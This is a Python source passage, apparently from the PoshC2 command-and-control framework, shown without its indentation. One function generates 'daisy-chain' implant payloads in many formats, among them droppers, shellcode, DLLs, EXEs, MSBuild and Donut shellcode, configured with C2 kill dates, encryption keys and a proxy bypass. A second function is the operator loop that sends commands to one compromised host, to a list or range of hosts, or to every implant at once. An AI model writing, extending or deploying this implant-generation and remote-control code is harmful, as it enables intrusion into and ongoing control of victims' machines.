def do_createdaisypayload(user, command):
name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
daisyurl = input(f"Daisy URL: e.g. {default_url} ")
if ("http://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost")
if ("https://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost")
daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
daisyhost = get_implantbyid(daisyhostid)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
pbindsecret = PBindSecret
pbindpipename = PBindPipeName
daisyurl, daisyurl_count = string_to_array(daisyurl)
daisyhostheader = ""
c = 0
daisyurls = daisyurl.split(",")
for url in daisyurls:
if c > 0:
daisyhostheader += ",\"\""
else:
daisyhostheader += "\"\""
c += 1
C2 = get_c2server_all()
urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "",
"", "", "")
newPayload = Payloads(C2.KillDate,
C2.EncKey,
C2.Insecure,
C2.UserAgent,
C2.Referrer,
"%s?d" % get_newimplanturl(),
PayloadsDirectory,
PowerShellProxyCommand=proxynone,
URLID=urlId,
PBindPipeName=pbindpipename,
PBindSecret=pbindsecret)
newPayload.PSDropper = (newPayload.PSDropper).replace(
"$pid;%s" % (daisyurl),
"$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers("%s_" % name)
newPayload.CreateShellcode("%s_" % name)
newPayload.CreateRaw("%s_" % name)
newPayload.CreateDlls("%s_" % name)
newPayload.CreateEXE("%s_" % name)
newPayload.CreateMsbuild("%s_" % name)
newPayload.CreateDonutShellcode("%s_" % name)
newPayload.BuildDynamicPayloads("%s_" % name)
print_good("Created new %s daisy payloads" % name)
input("Press Enter to continue...")
clear()
def get_implant_type_prompt_prefix(implant_id):
if "," in str(implant_id):
return ""
implant = get_implantbyid(implant_id)
pivot = implant.Pivot
pivot_original = pivot
if pivot_original.startswith("PS"):
pivot = "PS"
elif pivot_original.startswith("C#"):
pivot = "C#"
elif pivot_original.startswith("Python"):
pivot = "PY"
if "Daisy" in pivot_original:
pivot = pivot + ";D"
if "Proxy" in pivot_original:
pivot = pivot + ";P"
if "PBind" in pivot_original:
pivot = pivot + ";PB"
return pivot
def implant_command_loop(implant_id, user):
while (True):
try:
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.implant-history' %
PoshProjectDirectory),
auto_suggest=AutoSuggestFromHistory(),
style=style)
implant_id_orig = implant_id
if ("-" in implant_id) or ("all" in implant_id) or (","
in implant_id):
print(Colours.GREEN)
prompt_commands = POSH_COMMANDS
command = session.prompt("%s> " % implant_id,
completer=FirstWordFuzzyWordCompleter(
prompt_commands, WORD=True))
if command == "back" or command == 'clear':
do_back(user, command)
return
else:
implant = get_implantbyid(implant_id)
if not implant:
print_bad("Unrecognised implant id or command: %s" %
implant_id)
input("Press Enter to continue...")
clear()
return
prompt_commands = POSH_COMMANDS
if implant.Pivot.startswith('Python'):
prompt_commands = PY_COMMANDS
if implant.Pivot.startswith('C#'):
prompt_commands = SHARP_COMMANDS
if 'PB' in implant.Pivot:
style = Style.from_dict({
'': '#008ECC',
})
session = PromptSession(
history=FileHistory('%s/.implant-history' %
PoshProjectDirectory),
auto_suggest=AutoSuggestFromHistory(),
style=style)
prompt_commands = SHARP_COMMANDS
print(Colours.BLUE)
else:
print(Colours.GREEN)
print("%s\\%s @ %s (PID:%s)" % (implant.Domain, implant.User,
implant.Hostname, implant.PID))
command = session.prompt(
"%s %s> " %
(get_implant_type_prompt_prefix(implant_id), implant_id),
completer=FirstWordFuzzyWordCompleter(prompt_commands,
WORD=True))
if command == "back" or command == 'clear':
do_back(user, command)
return
# if "all" run through all implants get_implants()
if implant_id == "all":
if command == "back" or command == 'clear':
do_back(user, command)
return
allcommands = command
if "\n" in command:
ri = input(
"Do you want to run commands separately? (Y/n) ")
implants_split = get_implants()
if implants_split:
for implant_details in implants_split:
# if "\n" in command run each command individually or ask the question if that's what they want to do
if "\n" in allcommands:
if ri.lower() == "y" or ri == "":
commands = allcommands.split('\n')
for command in commands:
run_implant_command(
command, implant_details.RandomURI,
implant_id_orig, user)
else:
run_implant_command(command,
implant_details.RandomURI,
implant_id_orig, user)
else:
run_implant_command(command,
implant_details.RandomURI,
implant_id_orig, user)
# if "separated list" against single uri
elif "," in implant_id:
allcommands = command
if "\n" in command:
ri = input(
"Do you want to run commands separately? (Y/n) ")
implant_split = implant_id.split(",")
for split_implant_id in implant_split:
implant_randomuri = get_randomuri(split_implant_id)
# if "\n" in command run each command individually or ask the question if that's what they want to do
if "\n" in allcommands:
if ri.lower() == "y" or ri == "":
commands = allcommands.split('\n')
for command in commands:
run_implant_command(command, implant_randomuri,
implant_id_orig, user)
else:
run_implant_command(command, implant_randomuri,
implant_id_orig, user)
else:
run_implant_command(command, implant_randomuri,
implant_id_orig, user)
# if "range" against single uri
elif "-" in implant_id:
allcommands = command
if "\n" in command:
ri = input(
"Do you want to run commands separately? (Y/n) ")
implant_split = implant_id.split("-")
for range_implant_id in range(int(implant_split[0]),
int(implant_split[1]) + 1):
try:
implant_randomuri = get_randomuri(range_implant_id)
# if "\n" in command run each command individually or ask the question if that's what they want to do
if "\n" in allcommands:
if ri.lower() == "y" or ri == "":
commands = allcommands.split('\n')
for command in commands:
run_implant_command(
command, implant_randomuri,
implant_id_orig, user)
else:
run_implant_command(command, implant_randomuri,
implant_id_orig, user)
else:
run_implant_command(command, implant_randomuri,
implant_id_orig, user)
except Exception:
print_bad("Unknown ImplantID")
# else run against single uri
else:
allcommands = command
if "\n" in command:
ri = input(
"Do you want to run commands separately? (Y/n) ")
implant_randomuri = get_randomuri(implant_id)
# if "\n" in command run each command individually or ask the question if that's what they want to do
if "\n" in allcommands:
if ri.lower() == "y" or ri == "":
commands = allcommands.split('\n')
for command in commands:
run_implant_command(command, implant_randomuri,
implant_id_orig, user)
else:
run_implant_command(command, implant_randomuri,
implant_id_orig, user)
else:
run_implant_command(command, implant_randomuri,
implant_id_orig, user)
except KeyboardInterrupt:
continue
except EOFError:
new_c2_message("%s logged off." % user)
sys.exit(0)
except Exception as e:
traceback.print_exc()
print_bad(
f"Error running against the selected implant ID, ensure you have typed the correct information: {e}"
)
return